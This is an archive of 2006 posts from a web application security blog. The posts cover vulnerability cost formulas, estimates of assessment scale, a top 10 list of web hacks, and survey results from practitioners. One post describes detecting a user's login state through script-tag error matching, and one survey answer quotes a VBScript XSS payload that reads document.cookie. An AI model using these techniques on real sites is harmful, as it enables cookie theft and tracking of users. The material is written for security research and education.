Venture capitalist (Grossman Ventures https://grossman.vc), Internet protector and industry creator. Founded WhiteHat Security & Bit Discovery. BJJ Black Belt.
Thursday, December 28, 2006
Applying the formula
"Once flaws have been identified, what is my motivation to fix them? If you can't give me the likelihood of attack, and what I stand to lose by it being exploited, how many dollars should I invest to repairing it?"
As security practitioners, we continue to say how much the development environments need to learn to make secure software. I'd say there's another side to that coin - security practitioners need to be able to measure the impact of particular threats in terms of dollars so that we don't just reveal vulnerabilities and the threats that might exploit them, but what the business stands to lose of the vulnerability isn't fixed.
Very well stated and got me thinking about how this could be done. For some reason the movie Fight Club popped into my head with the scene about how Jack, as a automative manufacture recall coordinator, applied "the formula". Seemed like a fun way to go about it. :)
JACK (V.O.)
I'm a recall coordinator. My job is to apply the formula.
....
JACK (V.O.)
Take the number of vehicles in the field, (A), and multiply it by the probable rate of failure, (B), then multiply the result by the average out-of-court settlement, (C). A times B times C equals X...
JACK
If X is less than the cost of a recall, we don't do one.
BUSISNESS WOMAN
Are there a lot of these kinds of accidents?
JACK
Oh, you wouldn't believe.
BUSINESS WOMAN
... Which... car company do you work for?
JACK
A major one.
I know I know, I broke the first rule of Fight Club. Anyway, I have no idea how "real" this formula is or if its applied, but it seemed to make sense. I wondered if something similar could be applied to web application security. And if nothing else, an entertaining exercise.
Take the number of known vulnerabilities in a website, (A), and multiply it by the probability of malicious exploitation, (B), then multiply the result by the average average financial cost of handling a security incident, (C). A times B times C equals X...
If X is less than the cost fixing the vulnerabilities, we won't.
Sounds like it could work given you could be somewhat accurate in filling in the variables, which is the hard part. The thing is this process probably isn't a suitable task for an information security person. Maybe we need to seek the assistance of an economist of a probability theorist and see what they have to say.
moving forward: the knowns and unknowns
I think the reason behind the lack of consensus is due to void of data and/or a means to measure success. We’re essentially flying blind. Let’s rhetorically consider several questions people commonly ask:
“How do I find out how many websites I have?”
“What do they do and how *important* are they?”
“Who’s responsible for them?”
Digging into a single website….
“How large and complex is the code base?”
“What’s the rate of application code change?”
Narrowing down to vulnerabilities…
“What vulnerabilities do I have?”
“Who’s fault is it and how do I prioritize their remediation?”
“What do I do to protect myself in the meantime?”
Finally organizational changes…
“Which should I focus on, developer education or the use of a modern development framework?”
“Which testing process is better, white box or black box or glass box?”
Answering these questions is anything but simple, largely dependent on any number of factors, unknown to any single person, and varies from organization to organization. The point is an organization must be able to understand its current state of affairs. And we as an industry must be able measure if a particular strategy or solution is working and if so how well. This brings us to where I think we are today. Best-practices based upon conventional wisdom held over from other areas of information security, which do not apply here. A harsh reality.
To begin looking at things in fresh and new perspective, I find its helpful to line up the "knowns" and "unknowns" for a particular problem set. From there it’s easier to spot trends, relationships, inconsistencies, and areas that should yield immediate return from investigation.
- In what would normally be considered the largest, most popular, and “secure” websites, it’s found the vast majority have serious vulnerabilities. We have no idea about the security of the mid and lower end websites which are typically not assessed.
- Those typically in charge of information security do not have the same level of control over the safety of their websites as they do at the network infrastructure level. Consequently, the responsibility of website security is unassigned or rests among several constituencies.
- Attacks targeting the web application layer are growing year over year in number, sophistication, and maliciousness. Real would visibility into these attacks are extremely limited.
- Firewalls, patching, configuration, transmission/database encryption, and strong authentication solutions do not protect against the majority of web applications vulnerabilities.
- All software has defects and in turn will have vulnerabilities. Security enhancements provided by modern development frameworks help to prevent vulnerabilities, though will not eliminate them altogether. Measured benefit is unknown.
- Change rate of commerce web applications is relatively rapid updated with incremental revisions. Traditional PC or enterprise software tends to be slower with larger versioned builds. Web applications tend to have a steady and faster flow of vulnerabilities.
- Developer education in software security and implementing security testing inside the quality assurance phase reduces the number of vulnerabilities, but will not eliminate them. See #5. The overall expected reduction of vulnerabilities as a result is unknown.
- It’s impossible to find all vulnerabilities through automation, which requires a significant amount of experienced human time to complete thorough security testing. How much time is required and how close the process will come to finding everything is debatable.
- Web application security is a new and complex subject for which there is a limited population of experienced practitioners relative to the amount of workload.
- Web browser security is largely and fundamentally broken leaving unable to protect users against modern attacks. The situation hasn’t significantly improved with Firefox 2.0 or Internet Explorer 7.0. and it’s unclear it future releases will attempt to address the problem.
- Solutions must come from areas other than "fixing" the code
- We need to invest resources into measuring ROI from various solutions and best-practices
- Create training and perhaps certification programs for web application security professionals
- We need wider visibility into the real-world hacks
- We need to develop and implement new and innovated security designs for modern web browsers
Tuesday, December 26, 2006
The future of web application vulnerability assessment is about scale
Where are we now?
- 105 million sites are on the Web with 4 million new ones each month.
- Perhaps hundreds (?) of thousands of websites collect or distribute personal information, financial and healthcare data, credit card numbers, intellectual property, trade secrets, etc.
- Web application issues top every major Top-X vulnerability list.
- 8 out 10 websites are full of holes and most of the attacks are targeting the web application layer.
- Assessments should be performed after each code change or "major" release and require about a week or two of human-time to complete.
Analyzing the scope using some assumptions:
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform 40 assessments per year with base salary of $100,000 (US).
- Retail cost per assessment $5,000 (US). (Normally higher ranging between $8,000 - $15,000)
Today we'd need:
- 1 million total vulnerability assessments
- 25,000 experienced experts in web application VA
- $2,500,000,000 (US) in salary for web application experts
- $5,000,000,000 (US) retail assessment cost
Of course as the awareness of web application security builds the numbers will climb, but for now we have to face facts. And the fact is unless we can vastly improve the web application VA process, most websites will not be assessed for security and remain insecure. That’s what’s going on today. And that’s why I’m saying the future of web application vulnerability assessment is about scale.
While we certainly can’t reduce the number of “important” websites, can reduce the number of man-hours and expertise required to perform an assessment using technology and a modern processes. Modern assessment processes need to be highly streamlined, repeatable, thousands running concurrently and performable by less than top-tier webappsec experts. This is what it truly means to “scale”.
How much improve can be made near term is a subject of much debate, but we’re working on it. For fun, let’s try a few more guesses at how certain efficiencies will help.
Future improvements:
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform
40200 assessments per year with base salary of$100,000$80,000 (US). - Retail cost per assessment
$5,000$2,000 (US).
- 1 million total vulnerability assessments
- 5,000 experienced experts in web application VA
- $2,000,000,000 (US) in salary for web application experts
- $400,000,000 (US) retail assessment cost
Friday, December 22, 2006
Secure Code Through Frameworks
Secure Code Through Frameworks
105 million sites make their home on the Web - 4 million more move in each month. That’s a staggering number to think about, and as we well know, the vast majority of websites (I say 8 in 10) have serious security issues. Industry discussions go round and round about what should be done. We talk about secure coding practices, training, compliance, assessment, source-code audits, and the like. What’s going to work? Then I read something Robert Auger posted, the lack of security enabled frameworks is why we’re vulnerable, touching on an area I’ve thought a lot about recently.
Friday, December 15, 2006
Top 10 Web Hacks of 2006
Attacks always get better, never worse. That’s what probably what I’ll remember most about 2006. What a year it’s been in web hacking! There’s never been such a big leap forward in the industry and frankly it’s really hard to keep up. My favorite quote came today from Kryan:
"The last quarter of this year, RSnake and Jeremiah pretty much destroyed any security we thought we had left. Including the "I'll just browse without javascript" mantra. Could you really call that browsing anyways?"
To look back on what’s been discovered RSnake, Robert Auger, and myself collected as many of the new 2006 web hacks as we could find. We’re using the term "hacks" loosely to describe some of the more creative, useful, and interesting techniques/discoveries/compromises. There were about 60 to choose from making the selection process REALLY difficult. After much email deliberation we believe we created a solid Top 10. Below you’ll find the entire list in no particular order. Enjoy!
Top 10
- Web Browser Intranet Hacking / Port Scanning - (with JavaScript and with HTML-only and the improved model)
- Internet Explorer 7 "mhtml:" Redirection Information Disclosure
- Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
- Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images)
- Backdooring Media Files (QuickTime, Flash, PDF, Images, Word [2], and MP3's)
- Forging HTTP request headers with Flash
- Exponential XSS
- Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII)
- Web Worms - (AdultSpace, MySpace, Xanga)
- Hacking RSS Feeds
Honorable Mention
- Stealing User Information Via Automatic Form Filling
- Advanced Web Attack Techniques using GMail (Overwriting the Array
- Constructor)
- Google Vulnerable Code Dork
Full List
The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Stealing Search Engine Queries with JavaScript
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
JavaScript Port Scanning
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
JavaScript Portscanning and bypassing HTTP Auth
Bruteforcing HTTP Auth in Firefox with JavaScript
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
CSS History Stealing Acts As Cookie
Detecting FireFox Extentions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Browser Port Scanning without JavaScript
Widespread XSS for Google Search Appliance
Bypassing Filters With Encoding
Variable Width Encoding
Network Scanning with HTTP without JavaScript
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Governator Hack
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Selecting Encoding Methods For XSS Filter Evasion
Adultspace XSS Worm
Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again
Thursday, December 14, 2006
I know if you're logged-in, anywhere
The CSS History hack is a well-known brute force way to uncover where a victim user has traveled. Great Firefox extensions like SafeHistory are helping protect against this simple hack, but the cat and mouse game continues. Despite this tool, I’ve found a new way to tell where the user has been AND also if they are “logged-in”. People are frequently and persistently logged-in to popular websites. Knowing which websites can also be extremely helpful to improving the success rate of CSRF or Exponential XSS attacks as well as other nefarious information gathering activities.
The technique uses a similar method to JavaScript Port Scanning by matching errors from the JavaScript console. Many websites requiring login have URL’s that return different HTML content depending on if you logged-in or not. For instance, the “Account Manager” web page can only be accessed if you’re properly authenticated. If these URL’s are dynamically loaded into a <* script src=””> tag, they will cause the JS Console to error differently because the response is HTML, not JS. The type of error and line number can be pattern matched.
Using Gmail as an example, <* script src=” http://mail.google.com/mail/”>
If you are logged-in…
If you are NOT logged-in…
I mapped the error messages from a few popular websites and made some PoC code.
Firefox Only! (1.5 – 2.0) tested on OS X and WinXP. I don’t want to hear it about IE and Opera. :)
Wednesday, December 13, 2006
Looking back at my predictions for 2006
Research in 2006
1) I think their is going to be a lot of research, on the white hat and black hat side, in the area of web- based worms. Lots of creating and trading of JavaScript exploit code once an XSS issue is found.
Right on the money. Of course this might have been a self-fulfilling prophecy. :) Those are the best kind.
Commercial landscape in 2006
Personally I think compliance, specifically PCI, is going to be a big driver to improve web application security.
Blech, way off. PCI is a good standard with decent web application security components, but the enforcement of validation of compliance leaves something to be desired. When network scanning vendors can meet the minimum webappsec criteria with only the most rudimentary checks, then clearly there is improvement required. Checkbox != security. Maybe PCI will be a real driver by 2008. Time will tell.
To meet the requirements, I expect vendors will combine various types of vulnerability assessment products through innovation or acquisition. Current product/service offerings separate network, cgi, and web application assessment layers. Some combine 2, but not all three.
Off again yet again. I stil think this will happen, just don't know exactly when. I thought it would have taken place already.
To pass PCI quickly, we'll see people looking for simple solutions or hacks to clean up their vulnerabilities. Not everyone has the resources available to fix their web app code the right way. As a result, I expect new web server add-ons (or WAF's) and configuration set-ups will be employed as band-aids to prevent the identification of vulnerabilities. This is create an interesting challenge for the industry.
Let's call this a 50/50, I was correct about a huge increase in web application firewall deployments in the market led by ModSecurity and other commercial players. Way more WAF's on the Web than there were in 2004 and 2005. However, this didn't have anything to do with meeting PCI or a band-aid approach as I guessted. Most deployments I've seen have been towards defense-in-depth, bravo, but I was wrong in the prediction. :)
Then a few other predictions:
* a variety of different product/service standards
Nope. Wrong.
* certifications web application security professionals
Wrong again!
* other industries begin implementing PCI-like security standards
Sheesh, way off.
I'm no Nostradamus thats for sure.
Friday, December 08, 2006
Business Logic Flaws and Yahoo Games
"A few years back, Yahoo Games instituted an online chess ladder. A ladder system essentially ranks all the players from top to bottom, and you move up by beating people ranked higher on the ladder. Losing (or not playing) slowly lowers your ranking.
I'm a decent player—I won the state championship of Kentucky in my salad days—but couldn't begin to approach the top of Yahoo's ladder. But guess what? The people at the top weren't playing chess at all!
They were cheaters, a closed circle of players passing the crown around by systematically losing one-move games to each other. Player No. 2 challenges Player No. 1, makes one move to start the game, and then Player No. 1 resigns the game and they switch rankings on the ladder. "
There are literally thousands of people (or more) with an amazing about of free time to do the most mundane tasks for the most inane rewards. “Cheating” players would code purpose built programs to bot 100’s of chess games 24x7 simultaneously. They’d sit up late into the evening because every so often the ladder ranks would be reset, and when they did, they’d snatch the top spots. And once they owned a block of the top spots they’d only play within their controlled accounts to rise slowly in ranks. The way the ladder logic worked, “legit” ranked players must play against other equally or higher rank players, and since cheaters wouldn’t play against them, legit players would drop in rank.
All that just to be at the top of the Yahoo Chess games ladder. No monetary reward, no praise, no nothing. Makes you think where else this is going on doesn’t it?
Thursday, December 07, 2006
Ryan Barnett enters the Blogosphere
Wednesday, December 06, 2006
Web Application Security Professionals Survey (Dec. 2006)
"The scary unknown is intranet Website vulnerability, however, which the survey did not address. "There are no good metrics for how many intranet Websites there are, or how vulnerable they are. That's a big unknown in the industry," Grossman says. "It's a whole other world inside the firewall."
Update: Once again a great survey turn out. A total of 63 respondents. Thank you everyone whom responded and those who helped me out with the questions. We didn't reach my 100 prediction, but that's OK because I'm not very good at those anyway. :) We'll try to get there in January. The problem is its getting difficult to manage this by email, I'll have to figure out some way to remedy that. The data collected certainly did not disappoint and some interesting things bubbled to the top.
My Observations
Good representation from both security vendors and enterprise professionals. Most of which have several years of experience, a significant percentage of their time dedicated to web application security, and performed 1 - 40 assessments in 2006. An experienced bunch I’d say.
About half of organizations have vulnerability assessments performed see security measurement as the primary security driver and about a quarter say compliance. I would have figured measurement would have scored higher and compliance lower. Maybe we’re seeing a shift in the industry.
The vast majority of webappsec professionals believe assessments should be performed after each code change or "major" release, takes a week or two to complete, and rarely encounter multi-factor authentication or web application firewalls. About half of people using commercial scanners say scanner complete about half or less of their workload. The other half of people who don’t say assessment are faster to do by hand, have too many false positives, or too expensive. There is much more to talk about here, but that’ll come in another post.
Question 12a on disclosure yielded some interesting results. There majority of people are evenly split between “responsible” and “non” disclosure. Think about that. Just as many as are disclosing as those who don’t because there is inherent risk. As I’ve said before, discovery is going to be a big issue moving forward. We’re going to loose the check and balance we’ve relied upon with traditional commercial and open source software.
Description
Its been a month already since the last survey. In November we got a great turn out doubling the response from October. Maybe this time we'll reach 100 respondents. Anyway...
If you perform web application vulnerability assessments, whether personally or professionally, this survey is for you. 15 multiple choice questions designed to help us understand more about the industry in which we work. Most of us in InfoSec dislike taking surveys, however the more people who respond the more informative the data will be. So far the information collected has been really popular and insightful. And a lot of people helped out with the formation of these questions.
================================================================
Guidelines
- Open to those who perform web application vulnerability assessments/pen-tests
- Email your answers to jeremiah __at__ whitehatsec.com
- To curb fake submissions please use your real name, preferably from your employers domain.
- Submissions must be received by December 14.
Privacy: Absolutely no names or contact information will be released to anyone. Though feel free to self publish your answers (blogs).
================================================================
Questions
1) What type of organization do you work for?
a) Security vendor / consultant (63%)
b) Enterprise (23%)
e) Other (please specify) (10%)
c) Government (5%)
d) Educational institution (0%)
2) What portion of your job is dedicated to web application security (as opposed to development, general security, incident response, etc)?
a) All or almost all (53%)
b) About half (28%)
c) Some (20%)
d) None (0%)
3) How many years have you been working in the web application security field?
c) 2 - 4 (33%)
e) 6+ (25%)
d) 4 - 6 (20%)
b) 1 - 2 (13%)
a) Less than a year (10%)
4) In your experience, what's the primary reason why organizations have web application vulnerability assessments performed?
a) To measure how secure they are, or not (53%)
b) Industry regulation and/or compliance (25%)
c) Customers or partners ask for independent third-party validation (10%)
e) Other (please specify) (10%)
d) No idea (3%)
5) How often should web applications be assessed for vulnerabilities?
a) After every code change (65%)
e) Other (please specify) (20%) - Answers mostly revolved around "major" releases.
c) Quarterly (10%)
b) Annually (5%)
d) Before the auditors arrive (0%)
6) How many web application vulnerability assessments have you personally conducted this year (2006)?
b) 1 - 20 (50%)
c) 20 - 40 (23%)
d) 40 - 60 (13%)
e) 60+ (10%)
a) None (5%)
7) How many man-hours does it take you to complete a web application vulnerability assessment on the average website?
c) 20 - 40 (50%)
b) 0 - 20 (23%)
d) 60 - 80 (23%)
e) 80+ (5%)
a) None (0%)
Please ONLY answer ONE of the two following questions (#8 and #9)
Commercial Vulnerability Scanners: (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)
8) If commercial vulnerability scanners ARE part of your tool chest, how much of your preferred assessment methodology do they complete? 36 respondents (57%)
c) About half (58%)
d) A little bit (33%)
e) Not much (4%)
b) Most of it (4%)
a) All or almost all (0%)
9) If commercial vulnerability scanners are NOT part of your tool chest, why not? 27 respondents (43%)
d) Some combination of a, b, and c (61%)
a) Too many false positives (11%)
c) Faster to do assessments by hand (11%)
b) Too expensive (6%)
e) Haven't tried any of them (6%)
f) Other (please specify) (6%)
10) How often do you encounter web application firewalls blocking your attacks during a vulnerability assessment?
d) Never, or almost never (73%)
c) Sometimes (10%)
e) Hard to tell (10%)
b) About half of the time (5%)
a) A lot (3%)
11) While performing web application vulnerability assessment, how often do you encounter websites requiring multi-factor authentication?
(Hardware token, software token, secret questions, one-time passwords, etc.)
d) Never, or almost never (50%)
c) Sometimes (35%)
b) About half of the time (8%)
a) A lot (5%)
e) Hard to tell (3%)
12a) If you find a vulnerability in a website you don't have written permission to test, what do you do with the data MOST of the time?
b) Inform the website administrators (responsible disclosure) (36%)
c) Keep it to yourself, no sense risking jail or lawsuits (36%)
e) Other (please specify) (18%)
a) Post it sla.ckers.org (full-disclosure) (8%)
d) Sell it (3%)
Daniel Cuthbert: "WALK AWAY! spending 1 year fighting the british government over this exact thing made me realise this lone cowboy approach will never work :0)"
12b) How has the security of the average website changed this year (2006) vs. last year (2005)?
c) Same (50%)
b) Slightly more secure (28%)
d) Worse (20%)
a) Way more secure (3%)
e) No idea (0%)
13) What do you think of RSnake's XSS cheat sheet.
http://ha.ckers.org/xss.html
b) I like it (55%)
a) It rocks! (28%)
c) It has the basics, but there are more options (13%)
e) Never heard of it (5%)
d) Lame (0%)
14) Do you surf the Web with JavaScript turned off?
c) No (38%)
b) Sometimes (33%)
a) Yes (18%)
d) Only when clicking on links from Jeremiah (10%)
15) What operating system are you using to answer this question?
a) Windows (68%)
b) OS X (15%)
c) Linux (15%)
d) BSD (3%)
e) Other (please specify) (0%)
BONUS
16) The most valuable web application security tip/trick/idea/concept/hack/etc you learned this year (2006)? List just 1 thing. *Full list will be published*
When forms convert lower case to uppercase, use VBScript to test for XSS
since it is not case sensitive like JavaScript <* script type=text/vbscript>alert(DOCUMENT.COOKIE)<* /script>
When spidering a website use your standard USER AGENT, then crawl it agai
Using JavaScript to other than just stealing cookies :-P
The research and disclosure being done on sla.ckers.org and gnucitizen.org.
JavaScript Malware Intranet Hacking
I don't remember.
combination of XSS and XHR. (My next PoC will show you why)
Javascript Scanning
Blind SQL injection in MSSQL and MySQL, complex XSS injection (using the
great http://ha.ckers.org/xss.html)
I can tell you, but then I will have to sign you on an NDA :-)
XSS Shell
XSRF
mhtml: vulnerability - complete read access to the Internet on Internet
Explorer. Scary!
Learned none.
This might not be web app. related until after Vista is released (yeah, right).
I found interesting the concept of how to discover whether Visual Studio binaries have been /GS compiled; Used to mitigate local stack variable overflows.
Sorry, I'm restricted from saying. :/ I guess my best/most valuable tip that I use every time is don't become dependent on any one tip/trick/idea/concept/hack. :)
What cross domain restrictions? The web security model was completely smashed up this year and I don't pretend to claim to be smart enough to fix it. But what we got isn't working the way we thought it did.
I've found some new tools to try out, such as TamperIE, which I picked up from the "Hacking Web Applications Exposed 2nd Edition" book I purchased, and I believe you wrote the foreword. Plus I have to hand it to RSnake, id, maluc and the other people on sla.ckers.org, they just keep coming up with new attack vectors. Their disclosures can be a little frightening. As you said in the foreword, sometimes we just want to bury our head in the sand because we know most of the sites out there have vulnerabilities.
CSRF (Just after I tested a bloody forum too!)
impoving my XSS knowledge with the awesome help of ha.ckers.org and sla.ckers.org
Learning more about web servicves, SOAP, XML, etc.
That demonstrating issues to a vendor/customer is much less effective
than expressing the business liabilty and risk expressed in $s :-)
Fully understanding AJAX, which is important, even if all I learned was that it wasn't as big a deal as I expected it to be (from a security standpoint it is a much bigger deal from developer and user viewpoints).
There is nothing new under the sun. People still do dumb things.
XSS + Ajax avoids the same-domain security sandbox.
Bypassing filtering mechanims by UTF-16 encoding URLs even when there's no need to
Using POST content as a query string in most cases won't effect the way the receiving application reacts. Attacks are more portable and easier to demonstrate in link format.
Implications of Flash 9 crossdomain.xml, including flaws in the implementation and severe lack of best practice standards. The floodgates may be open on client-side code with cross-domain privileges (Quicktime, etc.), but it's good to see a misstep at least happening in the right direction.
This is my statement for the web application security year 2006:
Everyone can find a XSS vulnerability but fortunately only a few people can imagine what this really means.
Automating viewstate injection. Maybe I'll release some notes about it.
Nothing can replace experience!
session riding
XSS
Watch out for that stupid UTF-7 encoding.
Search myspace for answers to secret questions :)
Intranet IP scanning really opened up my thinking of what XSS could be used to accomplish.
Sunday, December 03, 2006
Followup: Myth-Busting AJAX (In)-Security
Anyway, as RSnake pointed out it’s been a busy week with a ton of new tricks posted. Maybe someone is going to starting combining these into something better. JavaScript Malware continues to evolve.